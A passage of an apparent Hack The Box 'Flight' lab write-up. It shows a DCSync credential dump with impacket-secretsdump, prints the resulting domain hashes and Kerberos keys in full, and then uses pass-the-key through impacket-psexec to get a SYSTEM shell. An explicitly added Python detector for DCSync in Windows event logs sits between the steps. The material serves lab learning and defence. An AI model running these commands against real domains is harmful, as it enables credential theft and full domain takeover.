DCSync


The machine account of the target system has been compromised through the TGT delegation technique. With the TGT of the g0$ account at my disposal, I can conduct the DCSync attack to fully compromise the target domain.

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ KRB5CCNAME=g0\$@g0.flight.htb.ccache impacket-secretsdump 'flight.htb/g0$@g0.flight.htb' -k -no-pass -dc-ip $IP -target-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
s.moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
r.cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
g.lors:1604:aad3b435b51404eeaad3b435b51404ee:affa4975fc1019229a90067f1ff4af8d:::
l.kein:1605:aad3b435b51404eeaad3b435b51404ee:4345fc90cb60ef29363a5f38e24413d5:::
m.gold:1606:aad3b435b51404eeaad3b435b51404ee:78566aef5cd5d63acafdf7fed7a931ff:::
c.bum:1607:aad3b435b51404eeaad3b435b51404ee:bc0359f62da42f8023fdde0949f4a359:::
w.walker:1608:aad3b435b51404eeaad3b435b51404ee:ec52dceaec5a847af98c1f9de3e9b716:::
i.francis:1609:aad3b435b51404eeaad3b435b51404ee:4344da689ee61b6fbbcdfa9303d324bc:::
d.truff:1610:aad3b435b51404eeaad3b435b51404ee:b89f7c98ece6ca250a59a9f4c1533d44:::
v.stevens:1611:aad3b435b51404eeaad3b435b51404ee:2a4836e3331ed290bd1c2fd2b50beb41:::
svc_apache:1612:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
o.possum:1613:aad3b435b51404eeaad3b435b51404ee:68ec50916875888f44caff424cd3f8ac:::
g0$:1001:aad3b435b51404eeaad3b435b51404ee:140547f31f4dbb4599dc90ea84c27e6b:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
administrator:des-cbc-md5:c7754cb5498c2a2f
krbtgt:aes256-cts-hmac-sha1-96:fb234268e90162081d11b7e9d5097091be02f42c25eec0d4bbf8a2442e9d40d0
krbtgt:aes128-cts-hmac-sha1-96:19d9549f8e011231c9a755e0b7d7695f
krbtgt:des-cbc-md5:9bf8155161a8e09e
s.moon:aes256-cts-hmac-sha1-96:48de57e200e25b1c3af677e7b51eee7c56aa414b9420578f0589cbb511289505
s.moon:aes128-cts-hmac-sha1-96:f7caecaae1d9b440b9967018e3e51b9d
s.moon:des-cbc-md5:2ab6a4c4c273d67a
r.cold:aes256-cts-hmac-sha1-96:296926d640823978cfd8dea60b749e853a37f761446af0b395b631098a90140b
r.cold:aes128-cts-hmac-sha1-96:309cb9b5651626b3a46b61d329a1cf6a
r.cold:des-cbc-md5:91b91079a80dd9c1
g.lors:aes256-cts-hmac-sha1-96:bfaf4779007a83d75a380271bce1604f68d76559456598a0411f0806492ff41e
g.lors:aes128-cts-hmac-sha1-96:2691b47070c034f62ece4666dedf634d
g.lors:des-cbc-md5:a8dffd9bd9768ad9
l.kein:aes256-cts-hmac-sha1-96:c6e0c7ccb7dda382cb67568c46790fa76197a064d116f9c3174c371f9fd55b16
l.kein:aes128-cts-hmac-sha1-96:de4fc76e315dd8575b53762ca0f02567
l.kein:des-cbc-md5:9e34f7dc58a843b9
m.gold:aes256-cts-hmac-sha1-96:c78fcdf6d24c4dc97c8529f4e553c8a40ce09f2bf7070015dadec0d6a0a2c2e9
m.gold:aes128-cts-hmac-sha1-96:8e493fabfc5934d170803d9f72edba63
m.gold:des-cbc-md5:c10ee3d32f404015
c.bum:aes256-cts-hmac-sha1-96:13979a025f384f0a4bee1f2a9ce070153415401cac19a955aa4a481aaf756917
c.bum:aes128-cts-hmac-sha1-96:4b55f9b30586369b51895978d156a487
c.bum:des-cbc-md5:efea1abca840ba9b
w.walker:aes256-cts-hmac-sha1-96:8550cc8578c70eac932e6ab1de4bbd1e89cf29c4e085d65e0b08fc612a6020c1
w.walker:aes128-cts-hmac-sha1-96:c071b18454a6624ddde12c9ddf6d8d08
w.walker:des-cbc-md5:efa25eeac237b5fe
i.francis:aes256-cts-hmac-sha1-96:832a16b70c274b3304d1a7acad1436dd882da176328bd201720273661989dd30
i.francis:aes128-cts-hmac-sha1-96:24de7c367fee08862eab61bca6c94ecd
i.francis:des-cbc-md5:57aebf1af41ff768
d.truff:aes256-cts-hmac-sha1-96:e3a0f167df5320065d33035d2dd9c8fc11d11d6444073b5f826b5a9dd7fb33ff
d.truff:aes128-cts-hmac-sha1-96:972d4bd171f9ff3a09e1f7463fe32114
d.truff:des-cbc-md5:febc6b491c197326
v.stevens:aes256-cts-hmac-sha1-96:f6ef7602f72072c7d8d52fa5b2bc479ab20e6f9a69e190a9681901c46583a078
v.stevens:aes128-cts-hmac-sha1-96:466605520d9643b9ea77016aa1d2d530
v.stevens:des-cbc-md5:a8e54fb90154fdce
svc_apache:aes256-cts-hmac-sha1-96:582dc5b5e2db775a9dee7b4ebc55f58811548a0682ac4bceb21de579385be9c3
svc_apache:aes128-cts-hmac-sha1-96:9bc038f14a0a0ff99f90ee88eaa8e92f
svc_apache:des-cbc-md5:feb09ece8f3d453e
o.possum:aes256-cts-hmac-sha1-96:042649ac9128597203cc88d0130af2708c1c77004c57b1c9979bb8c6af75b502
o.possum:aes128-cts-hmac-sha1-96:fcb7ed22eb484c773969089fe39d9d40
o.possum:des-cbc-md5:cdd0972cec1f2625
g0$:aes256-cts-hmac-sha1-96:11ad9a25157bdc6e7fd9df6c0872c33d790f7660c6f5e6ea526996b808e4d7bb
g0$:aes128-cts-hmac-sha1-96:fa0d7c35e273ae2121d1e3c54b19c3cf
g0$:des-cbc-md5:463d9edadc20e308
[*] Cleaning up... 

Domain Level Compromise
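Detection side of the step above, as an added example that is not part of the original write-up: a DCSync shows up in Windows auditing as Security event 4662 whose Properties list the DS-Replication-Get-Changes extended rights, and the DC machine-account case seen here (g0$ replicating from an attacker box) is only caught by correlating the 4662 logon session with its 4624 source address. The DC account set, the DC address list, the attacker address 10.10.14.7, the logon ids and the sample events are assumptions constructed for this example.

```python
import re

# The three extended rights a DCSync needs; a 4662 audit lists them in Properties.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Assumed environment knowledge: the domain's DC accounts and DC addresses.
DC_ACCOUNTS = {"G0$"}
DC_ADDRESSES = {"10.10.11.187"}

def find_dcsync(events):
    """Return (account, source address, reason) for every suspect replication request."""
    # 4662 carries no network address, so tie it to its logon session via 4624.
    logon_source = {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}
    hits = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        if not REPLICATION_GUIDS & set(GUID_RE.findall(e["Properties"].lower())):
            continue  # some other directory access, not replication
        account = e["SubjectUserName"]
        source = logon_source.get(e["SubjectLogonId"], "unknown")
        if account.upper() not in DC_ACCOUNTS:
            hits.append((account, source, "non-DC account requested directory replication"))
        elif source not in DC_ADDRESSES:
            # A name allowlist alone misses this: a stolen DC machine-account TGT
            # (the g0$ case above) replicates under a legitimate-looking name.
            hits.append((account, source, "DC account replicating from a non-DC address"))
    return hits

# Constructed sample events (real field names; logon ids and 10.10.14.7 are made up).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "G0$", "TargetLogonId": "0x5a1c3", "IpAddress": "10.10.14.7"},
    {"EventID": 4662, "SubjectUserName": "G0$", "SubjectLogonId": "0x5a1c3",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "TargetUserName": "G0$", "TargetLogonId": "0x91af2", "IpAddress": "10.10.11.187"},
    {"EventID": 4662, "SubjectUserName": "G0$", "SubjectLogonId": "0x91af2",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},  # DC from a DC address: normal
    {"EventID": 4624, "TargetUserName": "s.moon", "TargetLogonId": "0x7b22", "IpAddress": "10.10.14.7"},
    {"EventID": 4662, "SubjectUserName": "s.moon", "SubjectLogonId": "0x7b22",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # non-replication right: ignored
    {"EventID": 4662, "SubjectUserName": "s.moon", "SubjectLogonId": "0x7b22",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for account, source, reason in find_dcsync(SAMPLE_EVENTS):
        print(f"ALERT {account} from {source}: {reason}")
```

On the sample data the second G0$ request (from a DC address) is left alone, while the G0$ request from 10.10.14.7 and the s.moon request are both flagged.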

Shell Drop


┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ impacket-psexec 'flight.htb/administrator@g0.flight.htb' -aesKey 08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322 -k -no-pass -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] CCache file is not found. Skipping...
[*] Requesting shares on g0.flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WDYjZVkR.exe
[*] Opening SVCManager on g0.flight.htb.....
[*] Creating service QUJM on g0.flight.htb.....
[*] Starting service QUJM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
g0
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::23d
   IPv6 Address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   Link-local IPv6 Address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   IPv4 Address. . . . . . . . . . . : 10.10.11.187
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2

System Level Compromise